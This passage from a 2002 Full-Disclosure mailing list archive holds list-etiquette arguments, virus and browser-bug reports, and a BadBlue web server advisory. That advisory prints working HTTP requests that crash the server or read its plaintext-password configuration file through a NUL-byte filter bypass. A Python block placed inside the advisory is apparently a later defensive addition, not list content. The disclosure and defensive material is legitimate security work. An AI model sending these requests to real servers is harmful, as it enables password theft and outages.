> http://lists.netsys.com/mailman/listinfo/full-disclosure

From len at netsys.com Fri Jul 12 15:25:37 2002
From: len at netsys.com (Len Rose)
Date: Fri, 12 Jul 2002 10:25:37 -0400
Subject: [Full-Disclosure] Suggestion/Comments
Message-ID: <20020712102537.T24902@netsys.com>

One thing you can do to help out with the signal to noise ratio might be to help spread the word about this list and the premise behind it. If you work for a company or organization that generates advisories, and other types of intelligence it would also be great if you could get them to also post them here.

I wanted to note something that I'm sure many people already are aware of. Without moderating the list you're always going to see a lot of useless discussion. In the interests of non-censorship and free dissemination of information we do NOT want to moderate or control anyone's ability to be heard.

That being said, complaining about the noise only adds to the noise.

Thanks!

Len

PS .. would folks mind if we post the charter once a month via an automated message, much like the sun-managers mailing list?

From dufresne at winternet.com Fri Jul 12 15:32:19 2002
From: dufresne at winternet.com (Ron DuFresne)
Date: Fri, 12 Jul 2002 09:32:19 -0500 (CDT)
Subject: [Full-Disclosure] Suggestion/Comments
In-Reply-To: <20020712102537.T24902@netsys.com>
Message-ID:

Perhaps posting of the charter monthly would help remind folks of the focus of the list and reduce not only signal to noise, but offenses like vacation messages to the list and such, not to mention html posts...

Of course, after a charter has been ratified ...

thanks,

Ron DuFresne

On Fri, 12 Jul 2002, Len Rose wrote:

>
> One thing you can do to help out with the signal to noise
> ratio might be to help spread the word about this list
> and the premise behind it.
> If you work for a company or
> organization that generates advisories, and other types of
> intelligence it would also be great if you could get them
> to also post them here.
>
> I wanted to note something that I'm sure many people already
> are aware of. Without moderating the list you're always
> going to see a lot of useless discussion. In the interests
> of non-censorship and free dissemination of information we
> do NOT want to moderate or control anyone's ability to be
> heard.
>
> That being said, complaining about the noise only adds to
> the noise.
>
> Thanks!
>
> Len
>
> PS .. would folks mind if we post the charter once a month
> via an automated message, much like the sun-managers
> mailing list?
>

From SkyLined at edup.tudelft.nl Fri Jul 12 16:05:20 2002
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Fri, 12 Jul 2002 17:05:20 +0200
Subject: [Full-Disclosure] crash IE using jscript and page transitions
Message-ID: <001101c229b5$8a77c680$1b59a182@grotedoos>

(on my site: http://spoor12.edup.tudelft.nl/SkyLined v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS)

The problem

Internet Explorer 6.0 can be made to throw an exception using specially crafted jscript commands and page transitions. Other versions are probably vulnerable too but this has not been tested. Problems arise when a page transition is activated by a new page when the old page has not been rendered yet.
This situation can occur when javascript redirects the browser before the page is fully rendered.

An example

The following two pages, called 1.html and 2.html, crash IE with an Access violation in mshtml.dll when 1.html is loaded into IE.

1.html:

2.html:

Impact

Seems to be just a minor bug resulting in a DoS.

Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl/

(An HTML attachment was scrubbed from the archive; URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020712/4bb1f95e/attachment.html)

From BlueBoar at thievco.com Fri Jul 12 17:54:17 2002
From: BlueBoar at thievco.com (Blue Boar)
Date: Fri, 12 Jul 2002 09:54:17 -0700
Subject: [Full-Disclosure] crash IE using jscript and page transitions
References: <001101c229b5$8a77c680$1b59a182@grotedoos>
Message-ID: <3D2F09B9.80608@thievco.com>

From csnow at deltadentalwa.com Fri Jul 12 20:06:27 2002
From: csnow at deltadentalwa.com (Snow, Corey)
Date: Fri, 12 Jul 2002 12:06:27 -0700
Subject: [Full-Disclosure] New W32.Gibe variant making the rounds?
Message-ID:

I just a little while ago was informed by my mail system admin that a message intended for me had been snagged by our mail filters as containing the W32_GibeA virus. Many of you probably remember that this was the little bugger that went around under the guise of a Microsoft Security update and had an attachment called Q216309.exe, which was actually a backdoor and massmailer with its own SMTP engine.

Well, this one seemed to be a bit different. It had a return address of "pgp-key-request at hostmaster.org" and the subject line was "Introduction on ADSL". I've requested a copy of the original message. If and when I receive it, I'll forward any other relevant details along. I'm assuming that this is an attempt to tart up the original W32.Gibe virus and cause a new round of infections.
Apologies if this is something that is already seen; I was concerned that a new social-engineering attempt using the old Gibe virus was being made.

Regards,

Corey Snow

#########################################################
The information contained in this e-mail and subsequent attachments may be privileged, confidential and protected from disclosure. This transmission is intended for the sole use of the individual and entity to whom it is addressed. If you are not the intended recipient, any dissemination, distribution or copying is strictly prohibited. If you think that you have received this message in error, please e-mail the sender at the above e-mail address.
#########################################################

From measl at mfn.org Sat Jul 13 01:49:04 2002
From: measl at mfn.org (Alif The Terrible)
Date: Fri, 12 Jul 2002 19:49:04 -0500 (CDT)
Subject: [Full-Disclosure] New W32.Gibe variant making the rounds?
In-Reply-To:
Message-ID:

On Fri, 12 Jul 2002, Snow, Corey wrote:

> I just a little while ago was informed by my mail system admin that a
> message intended for me had been snagged by our mail filters as containing
> the W32_GibeA virus. Many of you probably remember that this was the little
> bugger that went around under the guise of a Microsoft Security update and
> had an attachment called Q216309.exe, which was actually a backdoor and
> massmailer with its own SMTP engine.
>
> Well, this one seemed to be a bit different. It had a return address of
> "pgp-key-request at hostmaster.org" and the subject line was "Introduction on
> ADSL". I've requested a copy of the original message. If and when I receive
> it, I'll forward any other relevant details along. I'm assuming that this is
> an attempt to tart up the original W32.Gibe virus and cause a new round of
> infections.
>
> Apologies if this is something that is already seen; I was concerned that a
> new social-engineering attempt using the old Gibe virus was being made.
>
> Regards,
>
> Corey Snow

You're about a week and a half late on this one.

--
Yours,

J.A. Terranson
sysadmin at mfn.org

If Governments really want us to behave like civilized human beings, they should give serious consideration towards setting a better example: Ruling by force, rather than consensus; the unrestrained application of unjust laws (which the victim-populations were never allowed input on in the first place); the State policy of justice only for the rich and elected; the intentional abuse and occasionally destruction of entire populations merely to distract an already apathetic and numb electorate... This type of demagoguery must surely wipe out the fascist United States as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers, associates, or others. Besides, if it *were* the opinion of all of those people, I doubt there would be a problem to bitch about in the first place...
--------------------------------------------------------------------

From mattmurphy at kc.rr.com Sat Jul 13 01:50:16 2002
From: mattmurphy at kc.rr.com (Matthew Murphy)
Date: Fri, 12 Jul 2002 19:50:16 -0500
Subject: [Full-Disclosure] Three BadBlue Vulnerabilities
Message-ID: <000f01c22a07$41826f00$e62d1c41@kc.rr.com>

Advisory: Working Resources BadBlue Multiple Vulnerabilities
Issue: Three vulnerabilities; a denial of service, an insecurity in password storage, and a file disclosure vulnerability that could allow viewing of the password file.
Risk: Critical
SecurityFocus: "Working Resources BadBlue Invalid Get Request Denial of Service Vulnerability" describes one of these issues.

Invalid GET Request Vulnerability
----------------------------------

By sending a specially crafted GET request (specifically, one with no filename component) it is possible to cause the server to stop handling further requests.
The administrator must fully exit and manually restart the server to resume normal operation:

GET HTTP/1.0

Some servers withstood this, but balked at a similar request:

GET  HTTP/1.0

The only difference here being two spaces instead of one.

Malformed Escaping Invalid Byte Vulnerability
-----------------------------------------------

By sending a malformed version of an HTTP-escaped NULL byte ("%00") BadBlue can be forced to return the source code of the desired file (or the binary content if the file is a binary). This vulnerability can be used to read the contents of EXT.INI, which stores BadBlue's configuration data, including any users or Access Control Lists (ACLs) on the server and the passwords for any such data, as well. The attacker simply appends ".% 00.txt" to the filename. BadBlue appears to strip spaces after HTTP-escaping, but does this after null-byte filtering has already been applied, causing this specially designed request to bypass the filter:

GET /ext.ini.% 00.txt HTTP/1.0

will reveal the contents of the BadBlue configuration file. If the server is configured to allow uploads, but not to allow read/execute access without a password, this can be used to break the password protection.

Un-encrypted Password Vulnerability
--------------------------------------

This vulnerability involves the password storage in the aforementioned ext.ini file. The vulnerability allows a local user with read access to the configuration file to see any passwords for secured resources or user accounts. BadBlue stores the passwords with no encryption at all, meaning that simply opening the file is sufficient for password theft. Combined with the above vulnerability, this enables a remote user to read the passwords of any BadBlue server.
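An added example, written for this digest and not taken from BadBlue, CARE 2002 or either advisory, that puts the two NUL-byte file-name issues side by side: the filter-before-decode ordering the BadBlue advisory above describes (simulated as one ordering consistent with the text; the server's real internals are not known), the canonicalise-then-validate ordering a server should use instead, and an allow-list resolver for the CARE 2002 language include earlier in the digest. SAFE_EXT, LANG_DIRS and all function names are constructed for the example.

```python
"""Constructed example (not BadBlue or CARE 2002 code): NUL bytes in
user-supplied file names, and why the ORDER of filtering and decoding
matters.  Standard library only."""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed allow-list of extensions a static server may hand out verbatim.
SAFE_EXT = {".html", ".htm", ".txt", ".gif", ".jpg"}


def badblue_style_filter(raw_path: str) -> Optional[str]:
    """Simulates the weak ordering the advisory describes: the null-byte
    filter inspects the RAW request text, and only afterwards are spaces
    stripped and percent-escapes decoded.  (The advisory's wording leaves
    the exact internal sequence open; this is one ordering that reproduces
    the described outcome.)  Returns the name a C-level open() would see,
    or None when the filter rejected the request."""
    if "%00" in raw_path.lower():           # 1. check runs on raw text
        return None
    compact = raw_path.replace(" ", "")     # 2. ".% 00.txt" -> ".%00.txt"
    decoded = unquote(compact)              # 3. "%00" -> "\x00"
    # A C string ends at the first NUL, so the ".txt" suffix that made the
    # server classify the file as plain text is never seen by open().
    # (Windows also ignores a trailing "." in a file name, so "ext.ini."
    # opens ext.ini.)
    return decoded.split("\x00", 1)[0]


def hardened_path(raw_path: str) -> Optional[str]:
    """Defender's ordering: canonicalise completely first, then validate
    the final form once, and fail closed on anything unexpected."""
    decoded = raw_path
    for _ in range(3):                      # decode to a fixed point so a
        again = unquote(decoded)            # "%2500" cannot turn into "%00"
        if again == decoded:                # one step after the check
            break
        decoded = again
    else:
        return None                         # still changing: reject
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return None                         # NUL and other control bytes
    if " " in decoded or "\\" in decoded:
        return None                         # never "repair" odd characters
    if ".." in decoded.split("/"):
        return None                         # no directory traversal
    clean = posixpath.normpath("/" + decoded.lstrip("/"))
    if clean.endswith(".") or posixpath.splitext(clean)[1] not in SAFE_EXT:
        return None                         # ext.ini is not on the list
    return clean


# Assumed set of language directories shipped with the application; a real
# deployment would build it from the language directory on disk.
LANG_DIRS = frozenset({"en", "de", "fr"})


def language_file(lang: str, page: str = "newsdummy") -> Optional[str]:
    """Allow-list replacement for CARE's
    include("../language/".$lang."/lang_".$lang."_newsdummy.php").
    Request data is only compared against known names, never spliced into
    a path, so "../../../etc/passwd%00" has nothing left to truncate.
    This is stricter than the file_exists() check the advisory suggests."""
    if lang not in LANG_DIRS:
        return None
    return f"../language/{lang}/lang_{lang}_{page}.php"


if __name__ == "__main__":
    for req in ("/ext.ini.% 00.txt", "/ext.ini.%00.txt", "/index.html"):
        print(f"{req!r:22} filter-first -> {badblue_style_filter(req)!r:14}"
              f" canonicalise-first -> {hardened_path(req)!r}")
    for lang in ("de", "../../../etc/passwd\x00"):
        print(f"lang={lang!r:28} -> {language_file(lang)!r}")
```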
From madduck at madduck.net Sat Jul 13 17:53:56 2002
From: madduck at madduck.net (martin f krafft)
Date: Sat, 13 Jul 2002 18:53:56 +0200
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To:
References:
Message-ID: <20020713165356.GA27723@fishbowl.madduck.net>

also sprach Ron DuFresne [2002.07.11.2010 +0200]:
> > BTW, spewing "[full-disclosure]" into the subject line is a very annoying
> > thing for a list to do.
> >
>
> Actually, it makes it quite easy for procmail recipies and certain mail
> readers to filter and categorize the messages.

there are many other headers one may use. e.g., i use:

* ^List-Id:.*full-disclosure\.lists\.netsys\.com

i do consider [Full-Disclosure] in the subject line rather annoying because it wastes valuable subject space. good mailing lists have subject lines that allow the pre-elimination of anything that doesn't concern one. especially if it's high traffic, this is something more than necessary. i vote to take the subject prefix off.

it would also be nice to have received headers cut off when the listprocessor starts its job on such a public mailing list.

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

wind catches lily, scattering petals to the ground. segmentation fault.

From madduck at madduck.net Sat Jul 13 17:55:16 2002
From: madduck at madduck.net (martin f krafft)
Date: Sat, 13 Jul 2002 18:55:16 +0200
Subject: [Full-Disclosure] ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!! ALERT!!!
In-Reply-To: <20020712015007.38EC318FBD@mail.zedz.net>
References: <20020712015007.38EC318FBD@mail.zedz.net>
Message-ID: <20020713165516.GB27723@fishbowl.madduck.net>

also sprach Nomen Nescio [2002.07.12.0350 +0200]:
> Bugtraq moderator will not post your message if you are GOBBLES or not liked.

because GOBBLES is ridiculous!

> death to anti.security.ls
> death to project mayhem
> Security Focus wants to be to security what Microsoft is to desktop
> Does not ISS own this title

you apparently have no clue. just shut up, please.

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

nobody expects the spanish inquisition. -- monty python

From list0570 at paradise.net.nz Sat Jul 13 23:06:20 2002
From: list0570 at paradise.net.nz (V K)
Date: Sun, 14 Jul 2002 10:06:20 +1200
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <20020713165356.GA27723@fishbowl.madduck.net>
References: <20020713165356.GA27723@fishbowl.madduck.net>
Message-ID: <20020713220620.GA3694@paradise.net.nz>

This list is run by mailman. I have made procmail filters for several list managers, see http://volker.orcon.net.nz/soft/procmail/

Use like:

# file away all mailman passwords
LISTFOLDER=mailmanpass-List
INCLUDERC=$PROCDIR/lm_mailman-member.rc

LISTNAME="full-disclosure"
LISTSERVERDOMAIN="lists.netsys.com"
LISTFOLDER=full-disclosure-List
INCLUDERC=$PROCDIR/lm_mailman.rc

> i do consider [Full-Disclosure] in the subject line rather annoying

Ditto, but I don't know whether mailman can do otherwise.

> it would also be nice to have received headers cut off when the
> listprocessor starts its job on such a public mailing list.

ABSOLUTELY. The "full-disclosure" does not refer to all the posters' details as well, or?

Volker

From SkyLined at edup.tudelft.nl Sun Jul 14 00:08:21 2002
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Sun, 14 Jul 2002 01:08:21 +0200
Subject: [Full-Disclosure] Re:Flares and personal opinions
References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz>
Message-ID: <003201c22ac2$2f1e1d80$1b59a182@grotedoos>

This is not a disclosure, just another attempt to stop these nonsense flares on this new list.
Please delete if you are not interested, with my apologies for bothering you.

1) I feel that if you have a problem with stuff like '[Full-disclosure]' being added to the email's topic, that this is your personal problem: deal with it yourself and stop whining to people who really don't care. By subscribing to this list, I assume you have basic knowledge of computer programming: write a small program or script that filters your email and removes this from the subject line. I personally am all in favor of these additions to the subject line.

2) Could everybody who doesn't have any information or disclosure to post, please not post at all? Just to take a random example, I quote martin f krafft:
--------------------------------------------------------------------------------
also sprach Nomen Nescio [2002.07.12.0350 +0200]:
> Bugtraq moderator will not post your message if you are GOBBLES or not liked.

because GOBBLES is ridiculous!

> death to anti.security.ls
> death to project mayhem
> Security Focus wants to be to security what Microsoft is to desktop
> Does not ISS own this title

you apparently have no clue. just shut up, please.
--------------------------------------------------------------------------------
True: If you have no clue, please shut up. That goes for anybody who doesn't have any useful information to post, which includes you, martin. (And because I feel I have to post this message, even though it doesn't include any vulnerability or exploit, me too. Sorry about that folks!)

So, everybody who feels publicly humiliated by this email or who wants to rant on any other non full-disclosure subject: I can be contacted at skylined at edup.tudelft.nl. If you feel I've wronged you: write ME; if you can convince me that you are right, I'll personally apologise on full-disclosure and reinstate your h4x0r status for you ;)

Also, if you agree with me on this subject, please do not post to full-disclosure just to tell everybody you do: nobody cares.
I propose that everybody who's subscribed to this list SPAMS anybody who posts another useless flare. I personally intend to.

Berend-Jan Wever aka SkyLined
http://sppor12.edup.tudelft.nl

From SkyLined at edup.tudelft.nl Sun Jul 14 01:15:48 2002
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Sun, 14 Jul 2002 02:15:48 +0200
Subject: [Full-Disclosure] Anonymous surfing my ass!
Message-ID: <000f01c22acb$9b46a0a0$1b59a182@grotedoos>

(html: http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT!)

Anonymous surfing websites are written by incompetent programmers keen on your money and not your privacy; I tested a few of them and found them wanting:
- Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!)
- The-cloak.com
- Megaproxy.com

These were all the sites I found with google and could get access to without registering; if you know some more, I'd be happy to hack my way out of their filters.
I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was.

Vendor status: hereby informed of the issue.

Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl

PS. I'm going on a holiday, so I won't respond to any replies for about a week. Tough luck!
From madduck at madduck.net Sun Jul 14 01:17:23 2002
From: madduck at madduck.net (martin f krafft)
Date: Sun, 14 Jul 2002 02:17:23 +0200
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <20020713220620.GA3694@paradise.net.nz>
References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz>
Message-ID: <20020714001723.GA28963@fishbowl.madduck.net>

also sprach V K [2002.07.14.0006 +0200]:
> Use like:
>
> # file away all mailman passwords
> LISTFOLDER=mailmanpass-List
> INCLUDERC=$PROCDIR/lm_mailman-member.rc
>
> LISTNAME="full-disclosure"
> LISTSERVERDOMAIN="lists.netsys.com"
> LISTFOLDER=full-disclosure-List
> INCLUDERC=$PROCDIR/lm_mailman.rc

Nice.

> > i do consider [Full-Disclosure] in the subject line rather annoying
>
> Ditto, but I don't know whether mailman can do otherwise.

List admin interface -> General options -> "Prefix for subject line of list postings"

> _______________________________________________
> Full-Disclosure - We believe in it.

Can someone define "believe" please? Is this our mission statement?

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

humpty was pushed.

From SkyLined at edup.tudelft.nl Sun Jul 14 01:37:52 2002
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Sun, 14 Jul 2002 02:37:52 +0200
Subject: [Full-Disclosure] Anonymous surfing my ass!
 (goproxy too)
References: <000f01c22acb$9b46a0a0$1b59a182@grotedoos>
Message-ID: <001d01c22ace$b0315d90$1b59a182@grotedoos>

While checking if I really tried all the services I can find with google, I discovered goproxy (www.goproxy.com). They were gone within 60 seconds too. Same old same old: forgot to take out the expression() DHTML.

----- Original Message -----
From: Berend-Jan Wever
To: webmaster at www.the-cloak.com ; Full Disclosure (netsys) ; security at anonymizer.com ; bugs at megaproxy.com
Sent: Sunday, July 14, 2002 2:15
Subject: [Full-Disclosure] Anonymous surfing my ass!

(html: http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT!)

Anonymous surfing websites are written by incompetent programmers keen on your money and not your privacy; I tested a few of them and found them wanting:
- Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!)
- The-cloak.com
- Megaproxy.com

These were all the sites I found with google and could get access to without registering; if you know some more, I'd be happy to hack my way out of their filters.
I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was.

Vendor status: hereby informed of the issue.

Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl

PS. I'm going on a holiday, so I won't respond to any replies for about a week. Tough luck!
From ulfh at Update.UU.SE Sun Jul 14 01:56:28 2002
From: ulfh at Update.UU.SE (Ulf Härnhammar)
Date: Sun, 14 Jul 2002 02:56:28 +0200
Subject: [Full-Disclosure] Re: Announcing new security mailing list
In-Reply-To: <20020714001723.GA28963@fishbowl.madduck.net>
References: <20020713165356.GA27723@fishbowl.madduck.net> <20020713220620.GA3694@paradise.net.nz> <20020714001723.GA28963@fishbowl.madduck.net>
Message-ID: <20020714025628.A19510@Update.UU.SE>

On Sun, Jul 14, 2002 at 02:17:23AM +0200, martin f krafft wrote:
> > _______________________________________________
> > Full-Disclosure - We believe in it.
>
> Can someone define "believe" please? Is this our mission statement?

Following a strong emotion, that can't be backed up by facts?

// Ulf

From madduck at madduck.net Sun Jul 14 02:00:38 2002
From: madduck at madduck.net (martin f krafft)
Date: Sun, 14 Jul 2002 03:00:38 +0200
Subject: [Full-Disclosure] Suggestion for this List
Message-ID: <20020714010038.GA29515@fishbowl.madduck.net>

Folks,

Let me use this email to put forth a suggestion I have for the direction of this list. I think there's potential in such a forum, but I am also trying to stay realistic in terms of manageable informational density.

One could call my suggestion "Append-only". I suggest that every post on this list shall bring out more relevant information on each issue, full disclosure, as the name implies. There should not be discussion nor questions. But it remains unmoderated and *any* (relevant!) information is welcome.

If there is an issue that a subscriber disagrees with, or is unsure about, then he shall contact the author of the post directly. Only after both parties are left without a misunderstanding should a follow-up post inform the list.

*Then* will this list become a precious resource.

Comments (privately if appropriate)?

-- 
martin; (greetings from the heart of the sun.)
\____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck

1-800-psych: hello, welcome to the psychiatric hotline. if you are co-dependent, please ask someone to press 2.

From hellnbak at nmrc.org Sun Jul 14 04:31:43 2002
From: hellnbak at nmrc.org (hellNbak)
Date: Sat, 13 Jul 2002 23:31:43 -0400 (EDT)
Subject: [Full-Disclosure] Anonymous surfing my ass!
In-Reply-To: <000f01c22acb$9b46a0a0$1b59a182@grotedoos>
Message-ID:

On Sun, 14 Jul 2002, Berend-Jan Wever wrote:

Combine an incompetent programmer with a wanna-be incompetent researcher and what do you get? A stupid advisory.

First of all, you "hacked your way out of" Anonymizer. Does this mean that you paid for their service, then managed to surf without being anonymous? Or, you managed to get their pay service for free? Either way doesn't point at a vulnerability that would expose one's privacy. Now if you were telling us that you are able to expose the originating IP address of web requests coming from these services, that would be something.

> Anonymous surfing websites are written by incompetent programmers keen on your money and not your privacy; I tested a few of them and found them wanting:
> - Anonymizer.com (I have hacked my way out of Anonymizer 4 times before and they still lack proper filtering!)
> - The-cloak.com
> - Megaproxy.com
> These were all the sites I found with google and could get access to without registering; if you know some more, I'd be happy to hack my way out of their filters.
> I'd like to mention that all filter faults were found within minutes, just to show (off) how easy this was.
>
> Vendor status: hereby informed of the issue.
>
> Berend-Jan Wever aka SkyLined
> http://spoor12.edup.tudelft.nl
>
> PS.
> I'm going on a holiday, so I won't respond to any replies for about a week. Tough luck!
>

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"I don't intend to offend, I offend with my intent"
hellNbak at nmrc.org
http://www.nmrc.org/~hellnbak
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From nick at virus-l.demon.co.uk Sun Jul 14 05:41:03 2002
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Date: Sun, 14 Jul 2002 16:41:03 +1200
Subject: [Full-Disclosure] Re:Flares and personal opinions
In-Reply-To: <003201c22ac2$2f1e1d80$1b59a182@grotedoos>
Message-ID: <0GZ8004KA2CGB6@smtp1.clear.net.nz>

"Berend-Jan Wever" wrote:

Nothing personal dude, but ...

Coming from someone who posts with:

> X-Mailer: Microsoft Outlook Express 6.00.2600.0000

and is too clueless to even configure it to prevent its obvious and usual crap such as:

> ------=_NextPart_000_002F_01C22AD2.F27DBAA0
> Content-Type: text/html;
> charset="iso-8859-1"
> Content-Transfer-Encoding: quoted-printable

<>

this:

<>

> ... I'll personally apologise on full-disclosure and reinstate
> your h4x0r status for you ;)

<>

is the best laugh on this list yet.

(If you don't understand my point, just disable the entirely unnecessary bandwidth-wasting HTML-ized copy of the messages you post to this list. And those contemplating posting HTML-only messages -- just don't do it.)

And yes, I know I'm posting to the list, but unlike most of the rest so far bitching about the crappy, off-topic posts, this is on-topic.

When you signed up, you got a confirmation request message. In part, it said:

   ... Send questions to full-disclosure-admin at lists.netsys.com.

If you don't like the "[Full-Disclosure]" Subject: prefix, mail the list admin and ask for it to be changed. If you don't like the noise-to-signal ratio, mail the list admin.
If you fail to get satisfaction from those approaches, consider unsubscribing as, while it remains an unmoderated list, some of the things people are so busy complaining about will remain facts of life.

This is not rocket science but "Mailing lists 101"...

Regards,

Nick FitzGerald

From benfell at greybeard95a.com Sun Jul 14 10:37:02 2002
From: benfell at greybeard95a.com (David Benfell)
Date: Sun, 14 Jul 2002 02:37:02 -0700
Subject: [Full-Disclosure] Re:Flares and personal opinions
In-Reply-To: <0GZ8004KA2CGB6@smtp1.clear.net.nz>
References: <003201c22ac2$2f1e1d80$1b59a182@grotedoos> <0GZ8004KA2CGB6@smtp1.clear.net.nz>
Message-ID: <20020714093701.GA1254@home.parts-unknown.org>

On Sun, 14 Jul 2002 16:41:03 +1200, Nick FitzGerald wrote:
> "Berend-Jan Wever" wrote:
>
> Nothing personal dude, but ...
>
Nonetheless, I felt he raised some valid points, even if I don't entirely agree with all of them.

Simply because this is an unmoderated list does not mean that normal rules of list etiquette do not apply. Among them, as you pointed out, is the one about HTML e-mail.

Having participated in a few flame wars myself, I'd hate to simply say that it's rude to flame. If we didn't care, we wouldn't get mad. And security is something to care about. So I'll say this about flaming instead:

When you flame, at least say something substantial. Simply saying that something sucks really doesn't cut it. Explain why it sucks, so we at least have something to argue about. The posting about the anonymizing web sites is a classic example. He just said it's broken, with hardly any explanation of why it's broken. He didn't explain his testing procedure, nor did he explain what results he's looking for, contrasting them with the ones he actually got. Finally, he didn't explain how these results undermine their utility in anonymizing web access.

Next, don't bother with old news. Old news is old news. It's dead.
Just because you can't bury it doesn't mean you should drag the rotten corpse around and force the rest of us to take a whiff. The postings about the Bugtraq lists are old news. Those lists have been around for years. There's nothing new about how they're being administered, so we really don't need to hear your general complaints about them here. Notice I said general complaints. If they're currently doing something specifically wrong with a specific issue, that's fair game, as long as you explain yourself.

Next, keep personal attacks to a minimum. If somebody is being stupid (as opposed to ill-informed), it's reasonable to whack them with a clue stick. But remember, we're here to exchange information, so explain yourself. Simply saying someone is a stupid dumbfsck is not nearly so impressive an argument as explaining point by point why everything they said is simply wrong.

There's an underlying theme here. Explain your position. You might be right, you might be wrong. Either, really, is okay, because even when you're wrong, we can show where you're wrong. Or maybe we're wrong in thinking you're wrong, in which case, you can argue back. We learn that way. The idea is that there always needs to be substance. As fellow humans, we might care about your emotions, but as administrators and programmers, we need information we can act on. Your anger is not something we can do a lot about.

My last point on flames would have to do with frequently asked questions which are documented. Remember that just because you know where to find the answer to that question doesn't mean I do. And sometimes I can't figure out what search terms to use to get reasonable results from Google. Also, some documentation, including a lot of man pages, seems to presume you already know the answer. Good technical documentation is hard to come by, partly because most technical writers are hacks working for marketing departments.
Documentation written by programmers, on the other hand, often suffers for a variety of reasons. So RTFM is often not an adequate response -- make allowance for that possibility.

When flaming, it is important to do it well. Otherwise you may look like the bigger fool. And if done well, flames still contain valuable information that can be useful in ferreting out the greater truth surrounding any particular issue. And that is why we're here.

-- 
David Benfell, LCP
benfell at parts-unknown.org
---
Resume available at http://www.parts-unknown.org/resume.html

From mail at blazde.co.uk Sun Jul 14 16:05:14 2002
From: mail at blazde.co.uk (Roland Postle)
Date: Sun, 14 Jul 2002 16:05:14 +0100
Subject: [Full-Disclosure] Anonymous surfing my ass!
References:
Message-ID: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub>

> Combine an incompetent programmer with a wanna-be incompetent researcher
> and what do you get? A stupid advisory.
>
> First of all, you "hacked your way out of" Anonymizer. Does this mean
> that you paid for their service, then managed to surf without being
> anonymous? Or, you managed to get their pay service for free?

I think if you at least clicked the advisory link ( http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT! ) it would help relieve some of your ignorance. What he's referring to is getting script (usually javascript) through the filters and executing on the 'anonymous' person's machine. If a site can do that they can save cookies to the machine, thereby breaking the anonymity.

It's not really cross site scripting, though the techniques used to get it through are similar.
Right now 'cross site scripting' seems to be the buzz word attached to any security breach involving scripts. Something we have to live with I guess. Anyway, whatever it's called SkyLined seems to be the l33test at it ;)

- Blazde

From steve at entrenchtech.com Sun Jul 14 16:35:39 2002
From: steve at entrenchtech.com (Steve)
Date: Sun, 14 Jul 2002 09:35:39 -0600
Subject: [Full-Disclosure] Anonymous surfing my ass!
In-Reply-To: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub>
Message-ID: <006301c22b4c$1e0afa60$6401a8c0@Laptop2>

You would think that the email sent to the list would have contained more information. Based on the email sent, one might not even bother clicking on the link. And for those of us who happen to be checking email on Windoze boxes, clicking on random Internet links probably isn't the brightest thing to do from IE unless you have bothered to disable all the various active scripting etc.......

How seriously would you take an email that simply said "click here www.clicktobeowned.com"

> I think if you at least clicked the advisory link ( http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous surfing, NOT! ) it would help relieve some of your ignorance. What he's referring to is getting script (usually javascript) through the filters and executing on the 'anonymous' person's machine. If a site can do that they can save cookies to the machine, thereby breaking the anonymity.
>
> It's not really cross site scripting, though the techniques used to get it through are similar. Right now 'cross site scripting' seems to be the buzz word attached to any security breach involving scripts. Something we have to live with I guess. Anyway, whatever it's called SkyLined seems to be the l33test at it ;)
>
> - Blazde

_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure at lists.netsys.com
http://lists.netsys.com/mailman/listinfo/full-disclosure

From cmason at unixzone.com Sun Jul 14 16:56:47 2002
From: cmason at unixzone.com (Chris L. Mason)
Date: Sun, 14 Jul 2002 11:56:47 -0400
Subject: [Full-Disclosure] Anonymous surfing my ass!
In-Reply-To: <006301c22b4c$1e0afa60$6401a8c0@Laptop2>
References: <004501c22b47$dc0e1ce0$0a00a8c0@violetclub> <006301c22b4c$1e0afa60$6401a8c0@Laptop2>
Message-ID: <20020714155647.GA27147@unixzone.com>

On Sun, Jul 14, 2002 at 09:35:39AM -0600, Steve wrote:
...
> bother clicking on the link. And for those of us who happen to be
> checking email on Windoze boxes, clicking on random Internet links
> probably isn't the brightest thing to do from IE unless you have
